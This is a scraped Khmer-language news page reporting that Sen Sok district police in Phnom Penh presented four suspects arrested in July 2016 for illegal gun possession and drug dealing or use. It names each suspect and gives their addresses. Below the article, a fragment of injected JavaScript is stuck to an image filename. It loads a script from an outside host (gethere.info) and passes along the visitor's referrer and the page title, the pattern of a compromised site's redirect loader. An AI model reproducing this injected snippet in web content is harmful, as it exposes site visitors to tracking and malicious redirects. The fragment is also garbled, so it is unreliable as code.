បង្ហាញមុខអ្នកប្រើអាវុធខុសច្បាប់និងជួញដូរ គ្រឿងញៀន៤នាក់មុនបញ្ជូនទៅសាលាដំបូងរាជធានីភ្នំពេញ

ភ្នំពេញ ៖ លោកម៉ក់ ហុង អធិការខណ្ឌសែនសុខបាន បង្ហាញមុខអ្នកប្រើអាវុធខុសច្បាប់និងជួញដូរ គ្រឿងញៀន៤នាក់មុនបញ្ជូនទៅសាលាដំបូងរាជធានីភ្នំពេញ។កាលពីម៉ោង០៩និង១៥នាទីព្រឹកថ្ងៃទី១៩ កក្កដា២០១៦នេះ។

ជនសង្ស័យខាងលើរួមមាន១ ឈ្មោះ គ្រី ម៉ុងហេងភេទប្រុសអាយុ២៦ឆ្នាំមុខរបរមិនពិតប្រាកដស្នាក់ នៅផ្ទះលេខ ៧៣ ក្រុម៦ ភូមិដីថ្មី សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ(ជួញដូរ.សម្រួលអោយប្រលប្រាស់គ្រឿងញៀន និងកាន់កាប់អាវុធខុសច្បាប់) ។

២ឈ្មោះគឹម ករុណា អាយុ២២ឆ្នាំមុខរបរនិស្សិត ស្នាក់នៅភូមិដីថ្មី សង្កាត់ភ្នំពេញ ខណ្ឌសែនសុខ ។
ទី៣ឈ្មោះ ចន ភិរះ ហៅអារ៉ា ហៅអាម៉ាប់ ហៅអាសិទ្ធ ហៅអាយក្ស ភេទប្រុសអាយុ២២ឆ្នាំ មុខរបរយោធាស្នាក់នៅពោធិចិនតុងសង្កាត់កាកាបខណ្ឌពោធិសែនជ័យ។ ទី៤ឈ្មោះ ខូវ ចាន់សិលា ភេទប្រុសអាយុ ២២ឆ្នាំមុខរបររត់តុស្នាក់នៅភូមិត្រពាំងឈូក សង្កាត់ទឹកថ្លាខណ្ឌសែនសុខ(ទាំង៣នាក់ខាងក្រោមនេះជាប់ពីបទប្រើប្រាសគ្រឿង ញៀន) ។

លោកម៉ក់ ហុង អធិការខណ្ឌបានប្រាប់ឱ្យដឹងថាករណីឃាត់ខ្លួនក្រុមខាងលើនេះធ្វើឡើងកាលពីម៉ោង១៩និង៣០ នាទីយប់ថ្ងៃទី១៧ កក្តដា ២០១៦ នៅចំណុចផ្ទះលេខ៧៣ ក្រុម៦ ផ្លូវបេតុងភូមិដីថ្មី សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ ដោយមានសហការណ៍ល្អពីស្ត្រីជាម្តាយជនសង្ស័យឈ្មោះ គ្រី ម៉ុងហេង បានប្តឹងទៅនគរបាលខណ្ឌសែនសុខ
ទើបកម្លាំងលោកចុះទៅបង្ក្រាបដោយឃាត់ខ្លួនបាន៤នាក់ខាងលើនិងដកហូតបានកាំភ្លើងខ្លី K54 មួយដើមមាន០៨គ្រាប់និងសំបកគ្រាប់ចំនួន០២ ថ្នាំញៀន០២កញ្ចប់ជញ្ជីងថ្លឹងមួយនិងសំភារះមួយ
ចំនួនទៀត ។

លោកបានបន្តថាក្រោយពីធ្វើការសាកសួរទៅលើឈ្មោះ គ្រី ម៉ុងហេង ពីរឿងដែលកាន់កាប់អាវុធខុសច្បាប់ ឈ្មោះ ខាងលើបានប្រាប់ថាកាំភ្លើងនេះខ្លួនបានទិញមកជាយូមកហើយដោយទុកគំរាមបាញ់ម្តាយនិងឪពុកពេលបង្ខំអោយខ្លួនទៅបន្សាបគ្រឿងញៀននិងទុកសម្រាប់ពេលដែលសមត្ថកិច្ចចុះបង្ក្រាបបើទាល់ច្រកនិងតដៃមិនខាន។

ក្នុងករណីបង្ក្រាបក្រុមជនសង្ស័យខាងលើនេះលោកវរះសេនីយ៍ឯក ម៉ក់ ហុង ក៍បានឧបត្ថមថវិការផ្ទាល់ខ្លួន ចំនួន៤០មឺុនរៀលជាការលើកទឹកចិត្តដល់លោកអនុសេនីយ៍ទោ ដួង វណ្ណះ នាយប៉ុស្តិ៍ស្តីទីសង្កាត់ភ្នំពេញថ្មីដែលប្រឹងប្រែងក្នុងការបង្ក្រាបលើករណីនេះ។

f750dd81-58ce-46f8-b838-2f6ca4bd1782 4bf27335-3083-4c56-9d55-c7eea568696d 8f673745-99ee-438b-916a-11473134297b 65d677bb-26ea-42db-9c1c-80b6ea7c7e3a13814613_1297253503625809_444284825_ns.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More